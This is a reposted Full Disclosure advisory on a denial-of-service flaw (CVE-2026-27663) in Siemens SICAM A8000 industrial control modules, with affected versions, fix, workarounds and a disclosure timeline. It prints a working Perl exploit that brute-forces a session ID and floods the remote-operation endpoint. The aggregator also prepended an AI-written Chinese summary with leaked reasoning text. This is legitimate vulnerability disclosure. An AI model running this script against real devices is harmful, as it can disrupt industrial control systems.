CyberDanube Security Research 20260408-0 | Remote Operation Denial of Service in Siemens SICAM A8000
嗯,用户让我帮忙总结一篇文章,控制在一百个字以内,而且不需要用“文章内容总结”这样的开头。首先,我得仔细阅读这篇文章,了解主要内容。 看起来这篇文章是关于西门子SICAM A8000设备的一个安全漏洞。漏洞名称是远程操作拒绝服务(CVE-2026-27663),影响版本是V25.30及以下。攻击者通过频繁请求可以导致设备服务中断,无法参数化PLC。解决方法是升级到V26.10,并建议限制网络访问和使用白盒安全评估。 用户的需求很明确,就是简明扼要地总结内容。我需要提取关键点:漏洞名称、受影响产品、影响版本、攻击后果、解决方法和建议措施。 然后,我要把这些信息浓缩到100字以内,确保不遗漏重要细节。同时,避免使用任何开头词,直接描述内容。 最后,检查一下是否符合要求,确保没有超过字数限制,并且信息准确无误。 </think> 西门子SICAM A8000设备存在远程操作拒绝服务漏洞(CVE-2026-27663),影响版本V25.30及以下。攻击者通过频繁请求可导致服务中断,无法参数化PLC。建议升级至V26.10,并限制网络访问以缓解风险。 2026-4-14 17:7:19 Author: seclists.org(查看原文) 阅读量:6 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 14 Apr 2026 10:43:15 +0000

CyberDanube Security Research 20260408-0
-------------------------------------------------------------------------------
                title| Remote Operation Denial of Service
              product| Siemens SICAM A8000 CP-8050/CP-8031/CP-8010/CP-8012
   vulnerable version| <=V25.30
        fixed version| V26.10
           CVE number| CVE-2026-27663
               impact| Medium
             homepage| https://siemens.com/
                found| 28.11.2025
                   by| T. Weber, S. Dietz, D. Blagojevic, F. Koroknai
                     | (Office Vienna)
                     | CyberDanube Security Research
                     | Vienna | St. Pölten
                     |
                     | https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Our purpose: We create technology to transform the everyday, for everyone.
By combining the real and the digital worlds, we can help accelerate both
digitalization and sustainability - so our customers around the world can
become more competitive, resilient and sustainable."

Source: https://www.siemens.com/global/en/company/about.html


Vulnerable versions
-------------------------------------------------------------------------------
Siemens SICAM A8000 CP-8050 Master Module (6MF2805-0AA00) / <=V25.30
Siemens SICAM A8000 CP-8031 Master Module (6MF2803-1AA00) / <=V25.30
Siemens SICAM A8000 CP-8010 Master Module (6MF2801-0AA00) / <=V25.31
Siemens SICAM A8000 CP-8012 Master Module (6MF2801-2AA00) / <=V25.31

See also the vendor advisory:
https://cert-portal.siemens.com/productcert/html/ssa-246443.html

Vulnerability overview
-------------------------------------------------------------------------------
1) Remote Operation Denial of Service (CVE-2026-27663)
The remote operation mode is vulnerable to an uncontrolled resource exhaustion.
By sending frequent requests, the service can be interrupted and the affected
PLC can no longer be parameterized. This vulnerabilitiy can be triggered with
less than 100 requests and stalls the service as log as it is restarted via the
web interface or if the device is rebooted.


Proof of Concept
-------------------------------------------------------------------------------
1) Remote Operation Denial of Service (CVE-2026-27663)
The following script can be used to force the CPCI85 process into a denial of
service state:
-----------------------------------------------------
#!/usr/bin/perl
#Author: T. Weber
#SICAM Remote Operation DoS <=V25.30
use strict;
use warnings;
use LWP::UserAgent;
use Parallel::ForkManager;

$ENV{'PERL_LWP_SSL_VERIFY_HOSTNAME'} = 0;
print "Enter target IP address: ";
chomp(my $ip = <STDIN>);

print "Enter target port: ";
chomp(my $port = <STDIN>);

print "Enter Y/N for HTTPS: ";
chomp(my $tls = <STDIN>);

if ($tls eq "Y") {
    $tls = "https";
} elsif ($tls eq "N") {
    $tls = "http";
} else {
    die "Invalid input for HTTPS (must be Y or N)\n";
}

my $server_endpoint = "$tls://$ip:$port/SICAM_TOOLBOX_1703_remote_connection_01.htm";
print "Testing $server_endpoint\n";
# user agent
my $ua = LWP::UserAgent->new(
    ssl_opts   => { SSL_verify_mode => 0 },
    keep_alive => 1,
    agent      => "SICAM TOOLBOX II"
);

# brute force session
my @hex = (0..9, 'A'..'F');
my $found_session;
for my $d1 (@hex) {
    for my $d2 (@hex) {
        for my $d3 (@hex) {
            for my $d4 (@hex) {
                my $session_id = "008cfd320836$d1$d2$d3$d4";
                my $req = HTTP::Request->new(POST => $server_endpoint);
                $req->header('content-type'   => 'text/plain');
                $req->header('Session-ID'     => $session_id);
                $req->header('UPLOADFILENAME' => 'abc.f20');
                $req->content('type=20&length=1&data=A');

                my $resp = $ua->request($req);

                if ($resp->is_success) {
                    print "[$session_id] OK: ", $resp->decoded_content, "\n";
                    if ($resp->decoded_content ne ""){
                                    print "found session\n";
                                    $found_session = $session_id;
                                    last;
                              }
                } else {
                    print "[$session_id] ERROR: ", $resp->status_line, "\n";
                }
            }
            if ($found_session ne ""){
                        last;
                  }
        }
        if ($found_session ne ""){
                  last;
            }
    }
    if ($found_session ne ""){
            last;
      }
}

#denial of remote operation
my $max_procs = 10;
my $pm = Parallel::ForkManager->new($max_procs);

my @alpha = (0..9);
for my $d1 (@alpha) {
    for my $d2 (@alpha) {
            $pm->start and next;
                  my $len = "$d1$d2";
                  
            my $req = HTTP::Request->new(POST => $server_endpoint);
            $req->header('content-type'   => 'text/plain');
            $req->header('Session-ID'     => $found_session);
            $req->header('UPLOADFILENAME' => 'abc.f20');
            $req->content('type=20&length='.$len.'&data=A');
            my $resp = $ua->request($req);

            if ($resp->is_success) {
                print "DoS Running: ".$d1.$d2."\n";
            } else {
                print "ERROR: ", $resp->status_line, "\n";
            }
            $pm->finish;
    }
}
$pm->wait_all_children;
-----------------------------------------------------
The service is still running but stalled and cannot be used anymore to set
parameters via Toolbox II.


Solution
-------------------------------------------------------------------------------
Install the latest version available.


Workaround
-------------------------------------------------------------------------------
Activate the web-interface to restart the service if needed. Deactivate remote
operation if not used. Restrict network access to the device in the
infrastructure.


Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends to perform a white-box security assessment of the SICAM
A8000 master module devices.


Contact Timeline
-------------------------------------------------------------------------------
2025-12-12: Contacting Siemens PSIRT. Siemens ProductCERT confirms issues.
2026-01-13: Siemens ProductCERT confirms to work on a fix.
2026-01-16: Siemens ProductCERT asks for more information regarding the
            exploitation. Provided more information.
2026-02-18: Asked for an update. Siemens ProductCERT provided a preliminary
            timeline.
2026-03-26: Siemens informs that patch has been released. Providing more time
            for customer to patch. Siemens published Advisory
2026-04-08: Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2026
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CyberDanube Security Research 20260408-0 | Remote Operation Denial of Service in Siemens SICAM A8000 Thomas Weber | CyberDanube via Fulldisclosure (Apr 14)

文章来源: https://seclists.org/fulldisclosure/2026/Apr/6
如有侵权请联系:admin#unsafe.sh